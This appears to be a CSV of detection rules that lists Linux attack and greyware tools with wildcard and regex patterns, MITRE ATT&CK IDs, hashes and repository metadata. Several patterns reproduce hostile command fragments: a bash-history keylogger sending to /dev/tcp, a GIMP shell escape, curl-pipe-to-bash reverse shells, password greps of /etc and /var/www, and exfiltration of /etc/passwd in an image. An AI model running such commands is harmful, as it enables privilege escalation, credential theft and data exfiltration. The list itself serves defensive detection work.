"*dirty_sock/archive/master.zip*",".{0,1000}dirty_sock\/archive\/master\.zip.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","#linux","N/A","10","10","5692","1110","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z"
"*exploit-database-bin-sploits/*",".{0,1000}exploit\-database\-bin\-sploits\/.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","#linux","N/A","10","10","5692","1110","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z"
"*files/team-edward.py*",".{0,1000}files\/team\-edward\.py.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","#linux","N/A","10","10","5692","1110","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z"
"*http://tarantula.by.ru/localroot/*",".{0,1000}http\:\/\/tarantula\.by\.ru\/localroot\/.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","#linux","N/A","10","10","5692","1110","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z"
"*http://tarantula.by.ru/localroot/2.6.x/h00lyshit*",".{0,1000}http\:\/\/tarantula\.by\.ru\/localroot\/2\.6\.x\/h00lyshit.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","#linux","N/A","10","10","5692","1110","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z"
"*https://cyseclabs.com/exploits/*",".{0,1000}https\:\/\/cyseclabs\.com\/exploits\/.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","#linux","N/A","10","10","5692","1110","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z"
"*https://web.archive.org/*https://www.kernel-exploits.com/media/*",".{0,1000}https\:\/\/web\.archive\.org\/.{0,1000}https\:\/\/www\.kernel\-exploits\.com\/media\/.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","#linux","N/A","10","10","5692","1110","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z"
"*ktsuss-lpe.sh*",".{0,1000}ktsuss\-lpe\.sh.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","#linux","N/A","10","10","5692","1110","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z"
"*legalhackers.com/exploits/CVE*",".{0,1000}legalhackers\.com\/exploits\/CVE.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","#linux","N/A","10","10","5692","1110","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z"
"*LibcRealpathBufferUnderflow/RationalLove.c*",".{0,1000}LibcRealpathBufferUnderflow\/RationalLove\.c.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","#linux","N/A","10","10","5692","1110","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z"
"*linux_sudo_cve-2017-1000367.c*",".{0,1000}linux_sudo_cve\-2017\-1000367\.c.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","#linux","N/A","10","10","5692","1110","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z"
"*linux-exploit-suggester*",".{0,1000}linux\-exploit\-suggester.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","#linux","N/A","10","10","5692","1110","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z"
"*linux-rds-exploit.c*",".{0,1000}linux\-rds\-exploit\.c.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","#linux","N/A","10","10","5692","1110","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z"
"*mysql-privesc-race.c*",".{0,1000}mysql\-privesc\-race\.c.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","#linux","N/A","10","10","5692","1110","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z"
"*nagios-root-privesc.sh*",".{0,1000}nagios\-root\-privesc\.sh.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","#linux","N/A","10","10","5692","1110","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z"
"*raw*/straight-shooter.c*",".{0,1000}raw.{0,1000}\/straight\-shooter\.c.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","#linux","N/A","10","10","5692","1110","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z"
"*return-wizard-rce-exim.txt*",".{0,1000}return\-wizard\-rce\-exim\.txt.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","#linux","N/A","10","10","5692","1110","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z"
"*sudopwn.c*",".{0,1000}sudopwn\.c.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","#linux","N/A","10","10","5692","1110","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z"
"*tomcat-rootprivesc-deb.sh*",".{0,1000}tomcat\-rootprivesc\-deb\.sh.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","#linux","N/A","10","10","5692","1110","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z"
"*vulnfactory.org/exploits/*.c*",".{0,1000}vulnfactory\.org\/exploits\/.{0,1000}\.c.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","#linux","N/A","10","10","5692","1110","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z"
"*GhostInTheNet.sh *",".{0,1000}GhostInTheNet\.sh\s.{0,1000}","offensive_tool_keyword","GhostInTheNet","Ultimate Network Stealther that makes Linux a Ghost In The Net and protects from MITM/DOS/scan","T1574 - T1565 - T1055","TA0007 - TA0040 - TA0043","N/A","N/A","Sniffing & Spoofing","https://github.com/cryptolok/GhostInTheNet","1","1","#linux","N/A","7","4","369","79","2023-04-27T07:07:29Z","2017-04-22T01:53:16Z"
"*wget* -O les.sh*",".{0,1000}wget.{0,1000}\s\-O\sles\.sh.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","#linux","N/A","10","10","5692","1110","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z"
"*gimp -idf --batch-interpreter=python-fu-eval -b 'import os* os.execl(*/bin/sh*",".{0,1000}gimp\s\-idf\s\-\-batch\-interpreter\=python\-fu\-eval\s\-b\s\'import\sos.{0,1000}\sos\.execl\(.{0,1000}\/bin\/sh.{0,1000}","greyware_tool_keyword","AutoSUID","automate harvesting the SUID executable files and to find a way for further escalating the privileges","T1548.003 - T1069.001 - T1068","TA0004 - TA0003 - TA0005","N/A","N/A","Discovery","https://github.com/IvanGlinkin/AutoSUID","1","0","#linux","N/A","9","4","371","77","2024-04-29T12:30:35Z","2021-11-28T19:44:18Z"
"*www.exploit-db.com/download/*",".{0,1000}www\.exploit\-db\.com\/download\/.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","#linux","N/A","10","10","5692","1110","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z"
"*git diff | ssh pastes.sh changes.patch*",".{0,1000}git\sdiff\s\|\sssh\spastes\.sh\schanges\.patch.{0,1000}","offensive_tool_keyword","pico","hacker labs - open source and managed web services leveraging SSH","T1021.005 - T1078 - T1105 - T1109 - T1197 - T1213","TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/picosh/pico","1","0","#linux","N/A","10","10","810","27","2024-12-04T16:09:21Z","2022-08-24T03:14:52Z"
"*www.securityfocus.com/archive/1/514379*",".{0,1000}www\.securityfocus\.com\/archive\/1\/514379.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","#linux","N/A","10","10","5692","1110","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z"
"*go run ./cmd/reverst/*",".{0,1000}go\srun\s\.\/cmd\/reverst\/.{0,1000}","offensive_tool_keyword","reverst","Reverse Tunnels in Go over HTTP/3 and QUIC","T1572 - T1071.001 - T1105","TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/flipt-io/reverst","1","0","#linux","N/A","10","10","933","37","2024-12-02T17:53:56Z","2024-04-03T13:32:11Z"
"*go-lsass --host *",".{0,1000}go\-lsass\s\-\-host\s.{0,1000}","offensive_tool_keyword","go-lsass","dumping LSASS process remotely","T1003 - T1055 - T1021.005","TA0006 - TA0008 - TA0009","N/A","N/A","Credential Access","https://github.com/jfjallid/go-lsass","1","0","#linux","N/A","9","1","24","4","2024-07-27T10:35:12Z","2023-11-30T18:45:51Z"
"*grep -* *DBPassword*",".{0,1000}grep\s\-.{0,1000}\s.{0,1000}DBPassword.{0,1000}","greyware_tool_keyword","grep","Detects suspicious shell commands indicating the information gathering phase as preparation for the Privilege Escalation. # search for plain text user/passwords","T1059 - T1046 - T1087.002 - T1078.004","TA0002 - TA0007 - TA0004 - TA0006","N/A","N/A","Privilege Escalation","N/A","1","0","#linux","greyware tool - risks of False positive !","3","6","N/A","N/A","N/A","N/A"
"*grep *password /var/www*",".{0,1000}grep\s.{0,1000}password\s\/var\/www.{0,1000}","greyware_tool_keyword","grep","search for passwords","T1005 - T1083 - T1213","TA0006","N/A","N/A","Credential Access","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","#linux","N/A","N/A","10","1445","187","2024-11-18T14:07:04Z","2021-08-16T17:34:25Z"
"*grep *password.* /etc/*.conf*",".{0,1000}grep\s.{0,1000}password\..{0,1000}\s\/etc\/.{0,1000}\.conf.{0,1000}","greyware_tool_keyword","grep","Detects suspicious shell commands indicating the information gathering phase as preparation for the Privilege Escalation. # search for plain text user/passwords","T1059 - T1046 - T1087.002 - T1078.004","TA0002 - TA0007 - TA0004 - TA0006","N/A","N/A","Privilege Escalation","N/A","1","0","#linux","greyware tool - risks of False positive !","3","6","N/A","N/A","N/A","N/A"
"*encode baseImage.jpg /etc/passwd newImage.jpg*",".{0,1000}encode\sbaseImage\.jpg\s\/etc\/passwd\snewImage\.jpg.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","N/A","N/A","Data Exfiltration","https://github.com/ytisf/PyExfil","1","0","#linux","N/A","10","8","765","136","2024-05-07T07:58:02Z","2014-11-27T19:06:24Z"
"*grep -i pass *",".{0,1000}grep\s\-i\spass\s.{0,1000}","greyware_tool_keyword","grep","Detects suspicious shell commands indicating the information gathering phase as preparation for the Privilege Escalation.","T1059 - T1046 - T1087.002 - T1078.004","TA0002 - TA0007 - TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/","1","0","#linux","greyware tool - risks of False positive !","3","6","N/A","N/A","N/A","N/A"
"*grep -i user *",".{0,1000}grep\s\-i\suser\s.{0,1000}","greyware_tool_keyword","grep","Detects suspicious shell commands indicating the information gathering phase as preparation for the Privilege Escalation. # search for plain text user/passwords","T1059 - T1046 - T1087.002 - T1078.004","TA0002 - TA0007 - TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://gtfobins.github.io/","1","0","#linux","greyware tool - risks of False positive !","3","6","N/A","N/A","N/A","N/A"
"*grep -roiE *password*",".{0,1000}grep\s\-roiE\s.{0,1000}password.{0,1000}","greyware_tool_keyword","grep","Detects suspicious shell commands indicating the information gathering phase as preparation for the Privilege Escalation. # search for plain text user/passwords","T1059 - T1046 - T1087.002 - T1078.004","TA0002 - TA0007 - TA0004 - TA0006","N/A","N/A","Privilege Escalation","N/A","1","0","#linux","greyware tool - risks of False positive !","3","6","N/A","N/A","N/A","N/A"
"*grep*password|pwd|pass*",".{0,1000}grep.{0,1000}password\|pwd\|pass.{0,1000}","greyware_tool_keyword","grep","search for passwords","T1213 - T1081","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","#linux","N/A","N/A","10","1445","187","2024-11-18T14:07:04Z","2021-08-16T17:34:25Z"
"*grep-through-commits.sh *",".{0,1000}grep\-through\-commits\.sh\s.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","#linux","N/A","7","1","93","10","2024-09-04T08:36:01Z","2021-11-15T13:40:56Z"
"*gtfobins*",".{0,1000}gtfobins.{0,1000}","greyware_tool_keyword","gtfobins","GTFOBins is a curated list of Unix binaries that can used to bypass local security restrictions in misconfigured systems malicious use of legitimate binaries","T1059 - T1068  -  T1136","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://gtfobins.github.io/","1","1","#linux","high false positive risks - low signal","2","5","N/A","N/A","N/A","N/A"
"*www.vsecurity.com/download/tools/*",".{0,1000}www\.vsecurity\.com\/download\/tools\/.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","#linux","N/A","10","10","5692","1110","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z"
"*xfrm_poc*lucky0*",".{0,1000}xfrm_poc.{0,1000}lucky0.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","#linux","N/A","10","10","5692","1110","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z"
"*/linux-pam-backdoor.git*",".{0,1000}\/linux\-pam\-backdoor\.git.{0,1000}","offensive_tool_keyword","linux-pam-backdoor","Linux PAM Backdoor","T1547.001 - T1556.003","TA0003 - TA0004","N/A","N/A","Persistence","https://github.com/zephrax/linux-pam-backdoor","1","1","#linux","N/A","10","4","314","81","2023-11-13T11:29:44Z","2017-06-08T21:14:34Z"
"*linux-pam-backdoor-master*",".{0,1000}linux\-pam\-backdoor\-master.{0,1000}","offensive_tool_keyword","linux-pam-backdoor","Linux PAM Backdoor","T1547.001 - T1556.003","TA0003 - TA0004","N/A","N/A","Persistence","https://github.com/zephrax/linux-pam-backdoor","1","1","#linux","N/A","10","4","314","81","2023-11-13T11:29:44Z","2017-06-08T21:14:34Z"
"*zephrax/linux-pam-backdoor*",".{0,1000}zephrax\/linux\-pam\-backdoor.{0,1000}","offensive_tool_keyword","linux-pam-backdoor","Linux PAM Backdoor","T1547.001 - T1556.003","TA0003 - TA0004","N/A","N/A","Persistence","https://github.com/zephrax/linux-pam-backdoor","1","1","#linux","N/A","10","4","314","81","2023-11-13T11:29:44Z","2017-06-08T21:14:34Z"
"*/.ltproxy.yml*",".{0,1000}\/\.ltproxy\.yml.{0,1000}","greyware_tool_keyword","LTProxy","Linux Transparent Proxy (Similar to Proxifiter)","T1090 - T1573.001 - T1571 - T1071.001","TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/L-codes/LTProxy","1","0","#linux","N/A","10","1","31","5","2024-11-27T05:09:47Z","2021-11-11T15:17:54Z"
"*/tmp/.ltproxy_proxychains_*",".{0,1000}\/tmp\/\.ltproxy_proxychains_.{0,1000}","greyware_tool_keyword","LTProxy","Linux Transparent Proxy (Similar to Proxifiter)","T1090 - T1573.001 - T1571 - T1071.001","TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/L-codes/LTProxy","1","0","#linux","N/A","10","1","31","5","2024-11-27T05:09:47Z","2021-11-11T15:17:54Z"
"*history -a* tail -n1 ~/.bash_history > /dev/tcp/*/*",".{0,1000}history\s\-a.{0,1000}\stail\s\-n1\s\~\/\.bash_history\s\>\s\/dev\/tcp\/.{0,1000}\/.{0,1000}","greyware_tool_keyword","bash keylogger","linux commands abused by attackers","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Exploitation tool","N/A","1","0","#linux","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A"
"*\LTProxy-main*","\\LTProxy\-main","greyware_tool_keyword","LTProxy","Linux Transparent Proxy (Similar to Proxifiter)","T1090 - T1573.001 - T1571 - T1071.001","TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/L-codes/LTProxy","1","0","#linux","N/A","10","1","31","5","2024-11-27T05:09:47Z","2021-11-11T15:17:54Z"
"*ac5f344727467b6ad9743b8ffa2646ed73180dbdb97224feec6c54c5160a1984*",".{0,1000}ac5f344727467b6ad9743b8ffa2646ed73180dbdb97224feec6c54c5160a1984.{0,1000}","greyware_tool_keyword","LTProxy","Linux Transparent Proxy (Similar to Proxifiter)","T1090 - T1573.001 - T1571 - T1071.001","TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/L-codes/LTProxy","1","0","#filehash #linux","N/A","10","1","31","5","2024-11-27T05:09:47Z","2021-11-11T15:17:54Z"
"*ipt2socks -R -n 9999 -j 50 -u * -s * -l *",".{0,1000}ipt2socks\s\-R\s\-n\s9999\s\-j\s50\s\-u\s.{0,1000}\s\-s\s.{0,1000}\s\-l\s.{0,1000}","greyware_tool_keyword","LTProxy","Linux Transparent Proxy (Similar to Proxifiter)","T1090 - T1573.001 - T1571 - T1071.001","TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/L-codes/LTProxy","1","0","#linux","N/A","10","1","31","5","2024-11-27T05:09:47Z","2021-11-11T15:17:54Z"
"*ltproxy restart*",".{0,1000}ltproxy\srestart.{0,1000}","greyware_tool_keyword","LTProxy","Linux Transparent Proxy (Similar to Proxifiter)","T1090 - T1573.001 - T1571 - T1071.001","TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/L-codes/LTProxy","1","0","#linux","N/A","10","1","31","5","2024-11-27T05:09:47Z","2021-11-11T15:17:54Z"
"*ltproxy start*",".{0,1000}ltproxy\sstart.{0,1000}","greyware_tool_keyword","LTProxy","Linux Transparent Proxy (Similar to Proxifiter)","T1090 - T1573.001 - T1571 - T1071.001","TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/L-codes/LTProxy","1","0","#linux","N/A","10","1","31","5","2024-11-27T05:09:47Z","2021-11-11T15:17:54Z"
"*https://*/releases/download/*/lse.sh*",".{0,1000}https\:\/\/.{0,1000}\/releases\/download\/.{0,1000}\/lse\.sh.{0,1000}","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","1","#linux","N/A","9","10","3457","574","2023-12-25T14:46:47Z","2019-02-13T11:02:21Z"
"*https://bin.ajam.dev//$(uname -m)/bash*",".{0,1000}https\:\/\/bin\.ajam\.dev\/\/\$\(uname\s\-m\)\/bash.{0,1000}","offensive_tool_keyword","hackshell","Make BASH stealthy and hacker friendly with lots of bash functions","T1070.003 - T1059.004 - T1564.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/hackerschoice/hackshell","1","0","#linux","N/A","9","3","216","22","2024-12-01T21:19:51Z","2024-07-16T15:56:11Z"
"*ltproxy stop*",".{0,1000}ltproxy\sstop.{0,1000}","greyware_tool_keyword","LTProxy","Linux Transparent Proxy (Similar to Proxifiter)","T1090 - T1573.001 - T1571 - T1071.001","TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/L-codes/LTProxy","1","0","#linux","N/A","10","1","31","5","2024-11-27T05:09:47Z","2021-11-11T15:17:54Z"
"*/LTProxy.git*",".{0,1000}\/LTProxy\.git.{0,1000}","greyware_tool_keyword","LTProxy","Linux Transparent Proxy (Similar to Proxifiter)","T1090 - T1573.001 - T1571 - T1071.001","TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/L-codes/LTProxy","1","1","#linux","N/A","10","1","31","5","2024-11-27T05:09:47Z","2021-11-11T15:17:54Z"
"*L-codes/LTProxy*",".{0,1000}L\-codes\/LTProxy.{0,1000}","greyware_tool_keyword","LTProxy","Linux Transparent Proxy (Similar to Proxifiter)","T1090 - T1573.001 - T1571 - T1071.001","TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/L-codes/LTProxy","1","1","#linux","N/A","10","1","31","5","2024-11-27T05:09:47Z","2021-11-11T15:17:54Z"
"*https://burrow.io/* | bash *",".{0,1000}https\:\/\/burrow\.io\/.{0,1000}\s\|\sbash\s.{0,1000}","greyware_tool_keyword","burrow","Expose localhost to the internet using a public URL","T1090 - T1102 - T1043 - T1071","TA0010 - TA0005 - TA0011","N/A","N/A","Data Exfiltration","https://burrow.io","1","0","#linux","N/A","9","8","N/A","N/A","N/A","N/A"
"*https://curlshell:* | bash",".{0,1000}https\:\/\/curlshell\:.{0,1000}\s\|\sbash","offensive_tool_keyword","curlshell","reverse shell using curl","T1105 - T1059.004 - T1140","TA0011 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/irsl/curlshell","1","0","#linux","N/A","10","10","450","71","2024-04-20T15:23:11Z","2023-07-13T19:38:34Z"
"*/mimipenguin/releases/download/*",".{0,1000}\/mimipenguin\/releases\/download\/.{0,1000}","offensive_tool_keyword","mimipenguin","A tool to dump the login password from the current linux user","T1003.007","TA0006 - TA0002 ","N/A","TeamTNT","Credential Access","https://github.com/huntergregal/mimipenguin","1","1","#linux","N/A","10","10","3839","637","2023-05-17T13:20:46Z","2017-03-28T21:24:28Z"
"*37aaa060ddae57e5457ffc47f65362682d64da54775c2211705b8a7becc9e657*",".{0,1000}37aaa060ddae57e5457ffc47f65362682d64da54775c2211705b8a7becc9e657.{0,1000}","offensive_tool_keyword","mimipenguin","A tool to dump the login password from the current linux user","T1003.007","TA0006 - TA0002 ","N/A","TeamTNT","Credential Access","https://github.com/huntergregal/mimipenguin","1","0","#filehash #linux","N/A","10","10","3839","637","2023-05-17T13:20:46Z","2017-03-28T21:24:28Z"
"*4d29f1251e4ef23a8e22ed209d547e84c421fa736b87646ddd8269c3a0e84093*",".{0,1000}4d29f1251e4ef23a8e22ed209d547e84c421fa736b87646ddd8269c3a0e84093.{0,1000}","offensive_tool_keyword","mimipenguin","A tool to dump the login password from the current linux user","T1003.007","TA0006 - TA0002 ","N/A","TeamTNT","Credential Access","https://github.com/huntergregal/mimipenguin","1","0","#filehash #linux","N/A","10","10","3839","637","2023-05-17T13:20:46Z","2017-03-28T21:24:28Z"
"*7e158727df39c819d0b51228683ec4d1f1e9a949da480d6852445fa968814f46*",".{0,1000}7e158727df39c819d0b51228683ec4d1f1e9a949da480d6852445fa968814f46.{0,1000}","offensive_tool_keyword","mimipenguin","A tool to dump the login password from the current linux user","T1003.007","TA0006 - TA0002 ","N/A","TeamTNT","Credential Access","https://github.com/huntergregal/mimipenguin","1","0","#filehash #linux","N/A","10","10","3839","637","2023-05-17T13:20:46Z","2017-03-28T21:24:28Z"
"*https://homeway.io/install.sh*",".{0,1000}https\:\/\/homeway\.io\/install\.sh.{0,1000}","greyware_tool_keyword","homeway.io","Expose local servers to the internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://homeway.io/","1","1","#linux","N/A","10","10","N/A","N/A","N/A","N/A"
"*af763332f70cf0137ebcb1d237e55a00c6fc0698982fec44fb012db4cb1be5df*",".{0,1000}af763332f70cf0137ebcb1d237e55a00c6fc0698982fec44fb012db4cb1be5df.{0,1000}","offensive_tool_keyword","mimipenguin","A tool to dump the login password from the current linux user","T1003.007","TA0006 - TA0002 ","N/A","TeamTNT","Credential Access","https://github.com/huntergregal/mimipenguin","1","0","#filehash #linux","N/A","10","10","3839","637","2023-05-17T13:20:46Z","2017-03-28T21:24:28Z"
"*c7d41f5a0fe15661632d70cde6b34787f87e4818d7c592ffa0c5b074fdb15712*",".{0,1000}c7d41f5a0fe15661632d70cde6b34787f87e4818d7c592ffa0c5b074fdb15712.{0,1000}","offensive_tool_keyword","mimipenguin","A tool to dump the login password from the current linux user","T1003.007","TA0006 - TA0002 ","N/A","TeamTNT","Credential Access","https://github.com/huntergregal/mimipenguin","1","0","#filehash #linux","N/A","10","10","3839","637","2023-05-17T13:20:46Z","2017-03-28T21:24:28Z"
"*e80bda100b7b75500bd6f4cc09e566e5467c784876bc01ba934ea8792daf8b11*",".{0,1000}e80bda100b7b75500bd6f4cc09e566e5467c784876bc01ba934ea8792daf8b11.{0,1000}","offensive_tool_keyword","mimipenguin","A tool to dump the login password from the current linux user","T1003.007","TA0006 - TA0002 ","N/A","TeamTNT","Credential Access","https://github.com/huntergregal/mimipenguin","1","0","#filehash #linux","N/A","10","10","3839","637","2023-05-17T13:20:46Z","2017-03-28T21:24:28Z"
"*f04f854c5bbfa8a33358efd2bb3e700e9be687250548a1cb21de1d661b5f04ff*",".{0,1000}f04f854c5bbfa8a33358efd2bb3e700e9be687250548a1cb21de1d661b5f04ff.{0,1000}","offensive_tool_keyword","mimipenguin","A tool to dump the login password from the current linux user","T1003.007","TA0006 - TA0002 ","N/A","TeamTNT","Credential Access","https://github.com/huntergregal/mimipenguin","1","0","#filehash #linux","N/A","10","10","3839","637","2023-05-17T13:20:46Z","2017-03-28T21:24:28Z"
"*fd8303c18bb8893e7d539cced09d4765805a37bd9ac5c92951ab381c70eec2a7*",".{0,1000}fd8303c18bb8893e7d539cced09d4765805a37bd9ac5c92951ab381c70eec2a7.{0,1000}","offensive_tool_keyword","mimipenguin","A tool to dump the login password from the current linux user","T1003.007","TA0006 - TA0002 ","N/A","TeamTNT","Credential Access","https://github.com/huntergregal/mimipenguin","1","0","#filehash #linux","N/A","10","10","3839","637","2023-05-17T13:20:46Z","2017-03-28T21:24:28Z"
"*mimipenguin.*",".{0,1000}mimipenguin.{0,1000}","offensive_tool_keyword","mimipenguin","A tool to dump the login password from the current linux user","T1003.007","TA0006 - TA0002 ","N/A","TeamTNT","Credential Access","https://github.com/huntergregal/mimipenguin","1","1","#linux","N/A","10","10","3839","637","2023-05-17T13:20:46Z","2017-03-28T21:24:28Z"
